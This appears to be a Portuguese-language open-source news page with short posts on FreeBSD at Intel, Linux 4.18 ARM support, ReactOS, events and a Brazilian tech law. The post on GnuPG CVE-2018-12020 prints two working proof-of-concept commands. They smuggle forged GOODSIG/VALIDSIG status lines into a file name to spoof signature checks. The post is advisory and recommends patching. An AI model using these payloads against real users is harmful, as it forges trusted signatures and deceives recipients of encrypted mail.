Detalhes

Escrito por Nícolas Wildner

• bsd
• intel
• freebsd

Ben Widawsky, um dos arquitetos de drivers gráficos Linux designado pela Intel e que está a 8 anos no cargo, irá cumprir tarefas com foco no aprimoramento do FreeBSD. Ben continua na Intel mas se afasta do time gráfico Linux para focar no desenvolvimento do FreeBSD. As contribuições de Ben não se limitarão a parte gráfica, e o desenvolvedor estava até buscando freedback de usuários/desenvolvedores para focar as melhorias nas áreas onde o FreeBSD ainda não está maduro o suficiente(segundo seus próprios usuários).

Duas semanas após a primeira postagem no blog de Ben Widawsky, uma segunda postagem foi feita explicando que este time com foco em FreeBSD é novo na Intel e compartilhou as ideias que coletou sobre melhoria.

Dentre os itens priorizados estão suporte a rede Intel 100GbE, melhorias de escalabilidade na NUMA, drivers de vídeo nativos para o FreeBSD(ao invés de drivers DRM portados do Linux), suporte 3D Xpoint, melhorias no gerenciamento de energia, melhorias gerais de segurança/estabilidade, suporte ao pass-through gráfico no FreeBSD, tempo de boot mais rápido, wireless Intel 802.11AC e mais.

Fonte 1: Phoronix

Fonte 2: Phoronix

Detalhes

Escrito por Nícolas Wildner

• segurança
• email
• gnu

Seguindo o fiasco da vulnerabilidade EFAIL que envolve formatação HTML em emails para sequestro de dados, temos o CVE-2018-12020.

De acordo com o CVE, o arquivo mainproc.c do GnuPG antes da versão 2.2.8 não trata corretamente o nome do arquivo durante o processo de criptografia e verificação, permitindo que o atacante insira a saída ao GnuPG através do filedescriptor 2 usando o --status-fd 2 . Uma sequência OpenPGP que represente o arquivo original em conjunção com as ações(códigos de status) GOODSIG e VALIDSIG são o suficiente para gerar um ataque válido. O problema foi corrigido nas versões GnuPG 2.2.8, Enigmail 2.0.7, GPGTools 2018.3, e python GnuPG 0.4.3 e a atualização destes softwares é recomendada. Também é uma boa pratica desabilitar o verbose no arquivo de configuração gpg.conf.

POCs:

1

$ echo 'Please send me one of those expensive washing machines.' \
| gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \
\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
\n[GNUPG:] TRUST_FULLY 0 classic\
\ngpg: '\'`" > poc1.msg

2

echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \
\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
\n[GNUPG:] TRUST_FULLY\
\n[GNUPG:] BEGIN_DECRYPTION\
\n[GNUPG:] DECRYPTION_OKAY\
\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
\ngpg: '\'`" > poc2.msg

Fonte 1: ArsTechnica

Fonte 2: CVE-2018-12020

Detalhes

Escrito por Nícolas Wildner

• libreboot
• respects_your_freedom

Diversas empresas estão criando produtos compatíveis com o selo Respects Your Freedom da Free Software Foundation. De uma forma bem simplificada, isto garante que o seu equipamento não te espiona executando tarefas que você não tenha autorizado. Infelizmente os computadores que atendem a estes requisitos possuem um hardware um pouco antigo, e no plano cartesiano das escolhas o usuário precisa abrir mão de performance para ter mais privacidade.

O hacker e amante de liberdade SolidHal está em uma jornada para criar um laptop que atinja os requisitos da FSF para o Respects Your Freedom, dando mais opções para estes usuários. Em seu trabalho ele faz com que o Chromebook Asus C201 marque todos os pontos necessários, instalando o LibreBoot e se livrando de todos os resquícios do Intel Management Engine. Contudo, havia um problema: A WiFi permantente do equipamento precisa de firmware proprietária. Para remediar a situação ele resolveu instalar internamente um adaptador de redes sem fio USB que possui o selo de aprovação da FSF.

Obviamente este equipamento não possuía uma porta USB interna mas SolidHal estudou um pouco e "sacrificou" a conexão da Webcam e após notar como o pinout funcionava,e converteu os fios em uma porta USB usando um pouco de solda. Como o adaptador wifi usb é bastante enxuto, pode ser posicionado nos espaços vagos que a carcaça do notebook possui. Sabemos que este tipo de setup pode gerar ruídos na antena(barreiras físicas e enclausuras de metal), mas são todos preços que os que desejam um hardware livre estão aptos a pagar.

Fonte: HackADay

Fonte da Fonte: Add a usb wifi dongle without losing a usb port (ath9k_htc)

Detalhes

Escrito por Nícolas Wildner

• linux
• arm

A plataforma ARM bem como seus SoCs receberam uma série de commits que serão aplicados na janela do Linux 4.18. Muita coisa legal vem aí:

• Suporte a SoC Qualcomm Snapdragon 845 (SDM845) o Kryo 385/845 de 4+4 núcleos atualmente utilizado em dispositivos móveis high-end.
• Suporte a SoCs Meson 8M2 e Amlogic quad-core Cortex-A9.
• Suporte a SoC Mediatek MT7623A.
• Suporte a Renesas R8A77990 / R-Car, SoC com foco em sistemas de entretenimento automotivo.
• Suporte a STMicroelectronics STM32F469.
• Driver USB 3.0 OTG adicionado a SoC Rockchip RK3399.

E o suporte a placas conhecidas inclui:

• Suporte a placa Raspberry Pi 3B+ foi pra mainline do Kernel.
• Suporte a placa Libre Computer ALL-H3-CC H2+ (SoC Allwinner H2+).
• Os hardwares NES e Super NES Classic Edition (ambos Allwinner A33) também foram para a mainline.
• O Valve Steam Link baseado no Berlin2CD teve sua Board DeviceTree adcionada. Isto habilita as interfaces UART, USB, Ethernet, I2C e SDIO. Audio, vídeo e gerenciamento de energia ainda não são suportados. O núcleo gráfico Vivante 3D pode ser inicializado mas não produz saída.
• Suporte a placa Pocketbeagle(TI AM335X).

Mais detalhes podem ser encontrados no pull request. Até mesmo o Linus se manifestou, afirmando que a adição do Snapdragon 845 poderá alavancar a utilização de notebooks ARM com processadores que "aguentarão o tranco".

Fonte: Phoronix

Detalhes

Escrito por André Machado

• leis

Na última terça-feira (12), o presidente Michel Temer sancionou a lei 13.674, que  incentiva empresas de informática, comunicação e tecnologia a investirem em pesquisa, desenvolvimento e inovação, recebendo isenções tributárias em retorno.

Foram alterados os textos das leis 8.248, que trata de capacitação e competitividade; e a Lei 8.387, que exigia que empresas apresentassem contrapartida para receber incentivos fiscais. Foi vetado o teto de 20% dos gastos em pesquisa, inovação e desenvolvimento com aquisição, implantação, ampliação ou modernização de infraestrutura física e de laboratórios, pois o presidente entendeu que  "não é razoável que gastos relativos às áreas dedicadas à administração, por não guardarem consonância direta com investimentos em PD&I, sejam ensejadores de incentivo tributário".

Fonte: CanalTech.

Detalhes

Escrito por Nícolas Wildner

• btrfs
• reactos
• gsoc

O ReactOS é um projeto muito louco: Um time Russo fazendo uma implementação opensource compatível com a API Win32.

Apesar de uma relação de polinização cruzada de códigos bastante próxima com o Wine, a ideia deste sistema operacional é ser um substituto completo do Windows onde o usuário pode instalá-lo e sair usando executáveis sem a necessidade de configurações extras. O projeto andava adormecido nos últimos anos e o lançamento da versão 0.4.8 mostra que os desenvolvedores ainda estão vivos e fazendo melhorias significativas para o sistema.

Um projeto bastante promissor no Google Summer of Code pareceu: Fazer com que o ReactOS inicialize no BTRFS. Até agora(segunda semana de GSoC), o estudante Victor Perevertkin alterou o instalador e conseguiu formatar e instalar o ReactOS em BTRFS com alguns bugs mínimos.

Victor também está fazendo testes para garantir que o FreeLdr(bootloader do ReactOS) consiga inicializar diversas versões do Windows, aprimorando indiretamente outro aspecto deste bootloader.

Fonte: GSoC 2018 - Project BTRFS Boot

Detalhes

Escrito por Nícolas Wildner

• eventos
• bsd
• bsdday

O Evento BSDDAY em Seropédica-RJ havia sido adiado por conta da paralisação dos caminhoneiros. Contudo, a nova data foi definida para 30 de Junho de 2018. A programação continua sólida e sem alteração no local do evento.

A entrada é franca e se você deseja doar para o evento, acesse o seguinte link.

Acompanhe a fonte desta postagem para atualizações sobre o evento.

Fonte: BSDDAY 2018

Detalhes

Escrito por Nícolas Wildner

• eventos
• tchelinux

A Chamada de Trabalhos para o Tchelinux Caxias do Sul está aberta e caso você tenha interesse em submeter uma palestra, por favor, preencha o formulário de submissão de palestras. O prazo máximo é 07 de Julho de 2018, e os trabalhos escolhidos serão publicados no dia 10 de Julho de 2018.

Finalizada a etapa de escolha das palestras, as inscrições para participação no evento estarão abertas de 14 de Julho a 17 de Agosto de 2018. 250 vagas serão disponibilizadas.

O evento ocorrerá em parceria com a Universidade de Caxias do Sul, no dia 18 de Agosto de 2018 a partir das 08:30h na UCS de Caxias do Sul. A entrada é franca, porém os participantes são encorajados a doar 2kg de alimentos não perecíveis (exceto sal), que serão doados a instituições de caridade da região.  Os alimentos são recebidos no momento do credenciamento.

Acompanhe a fonte da postagem para atualizações sobre o evento.

Fonte: Tchelinux Caxias do Sul

Formulário para Envio de Palestras: Aqui

Detalhes

Escrito por André Machado

• distribuição

Para celebrar seu 14º aniversário, o popular site Phoronix rodou sua famosa suíte de testes em um MacBook Pro de 15 polegadas para comparar o desempenho de vários sistemas operacionais. Como resultado, a distribuição Clear Linux 22780 ficou na frente 59% das vezes, seguido pelo macOS 10.13.4, terminando em primeiro 21% das vezes e o Fedora 28, terminando em primeiro 10% das vezes.

O Clear Linux é uma distribuição focada em aplicações de nuvem, clientes e IoT, desenvolvida pela Intel. Talvez isso explique, em parte, o bom desempenho do sistema nos testes.

Fonte: https://apple.slashdot.org/story/18/06/09/202257/clear-linux-beats-macos-in-macbook-pro-benchmark-tests

Detalhes

Escrito por André Machado

• comunidade
• educação

O i-Educar é um software público e on-line voltado à gestão de escolas, como matrículas e dados dos alunos. No último dia 5, o portal do Software Público Brasileiro anunciou que o mesmo estava recebendo novas funcionalidades, com destaque para revisão e aprimoramento do código, uma nova interface e o módulo de Diário do Professor para a versão Comunidade, bem como um aplicativo para faltas que funciona sem internet na sala de aula. O projeto receberá, ainda, investimentos da Fundação Lemann, do Instituto Federal de Mato Grosso do Sul (IFMS) e do Ministério da Ciência, Tecnologia, Inovações e Comunicações (MCTIC).

Por questões de transparência, a Portabilis manterá o repositório do projeto no Gitlab do Portal do Software Público Brasileiro sempre atualizado, sem desvirtuar o projeto e o Portal do SPB. De acordo com um dos colaboradores deste portal que trabalhou no projeto, existem duas versões do sistema: uma comunitária e outra paga. O projeto pertencia, originalmente, à Prefeitura Municipal de Itajaí, quando foi transferido para a Portabilis, na qual mudou de liderança e teve seus fontes abertos, ao passo que a prefeitura teria criado outro sistema, chamado Erudio, sem os fontes disponíveis à comunidade.